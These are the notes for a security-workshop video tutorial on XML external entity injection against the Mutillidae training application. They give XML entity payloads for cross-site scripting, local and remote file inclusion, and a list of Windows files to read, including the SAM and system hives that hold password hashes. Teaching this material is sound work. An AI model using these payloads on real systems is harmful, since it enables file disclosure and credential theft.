Title: Video Tutorial: Introduction to XML External Entity Injection

Author: webpwnized

From: ISSA KY Sept 2013 Workshop (Louisville, KY)

Twitter: @webpwnized

This video introduces XML injection to achieve XML external entity injection (XXE) and XML based cross site scripting (XSS). Please find notes used/mentioned in video posted below the video.

1. What is XML injection

2. What is an "entity"

3. What is entity injection

4. Cross site scripting with entity injection

5. Determining local execution path

6. Determining privileges of "user"

7. Directory traversal

8. file:/// protocol

9. Local File Inclusion with entity injection

Firefox --> Burp-Suite --> Apache2 --> PHP App Server --> PHP Code --> XML Parser --> PHP --> Apache2 --> Burp-Suite --> Firefox

Basics

<?xml version="1.0"?><change-log><text>Hello World</text></change-log>

<?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>

Information Disclosure

C:\xampp\htdocs\mutillidae\xml-validator.php

file:///C:/xampp/htdocs/mutillidae/xml-validator.php

Try to cause various errors in order to coax information from XML parser

Try to load files that dont exist

Put whitespace before the XML

Send malformed XML

Determine operating system type and the path at which interpretation is taking place

Cross site scripting

<?xml version="1.0"?><change-log><text><script>alert("FAIL")</script></text></change- log>

<?xml version="1.0"?><change-log><text>&lt;script&gt;alert(&quot;Hello World&quot;)&lt;/script&gt;</text></change-log>

Local File Inclusion

Try to acquire application configuration files and/or source code files

Try to acquire operating system files

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>

Remote File Inclusion

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text></change-log>

Windows XP SP3

  %WINDIR% = C:\WINDOWS

  %SYSTEMDRIVE% = C:

  %SYSTEMROOT% = C:\WINDOWS

Credit: Rob "Mubix" Fuller

  file:///C:\WINDOWS\System32\drivers\etc\hosts

  %WINDIR%\System32\drivers\etc\hosts

Blind Files

  %SYSTEMDRIVE%\boot.ini

  A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.

  %WINDIR%\win.ini

  This is another file to look for if boot.ini isn't there or coming back, which is sometimes the case.

  %SYSTEMROOT%\repair\SAM

  %SYSTEMROOT%\System32\config\RegBack\SAM

  It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods

  %SYSTEMROOT%\repair\system

  %SYSTEMROOT%\System32\config\RegBack\system

Files To Pull (if possible)

  %SYSTEMDRIVE%\pagefile.sys

  Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size

  %WINDIR%\debug\NetSetup.log

  %WINDIR%\repair\sam

  %WINDIR%\repair\system

  %WINDIR%\repair\software

  %WINDIR%\repair\security

  %WINDIR%\iis6.log (5, 6 or 7)

  %WINDIR%\system32\logfiles\httperr\httperr1.log

  IIS 6 error log

  %SystemDrive%\inetpub\logs\LogFiles

  IIS 7's logs location

  %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

  %WINDIR%\system32\config\AppEvent.Evt

  %WINDIR%\system32\config\SecEvent.Evt

  %WINDIR%\system32\config\default.sav

  %WINDIR%\system32\config\security.sav

  %WINDIR%\system32\config\software.sav

  %WINDIR%\system32\config\system.sav

  %WINDIR%\system32\CCM\logs\*.log

  %USERPROFILE%\ntuser.dat

  %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

  %WINDIR%\System32\drivers\etc\hosts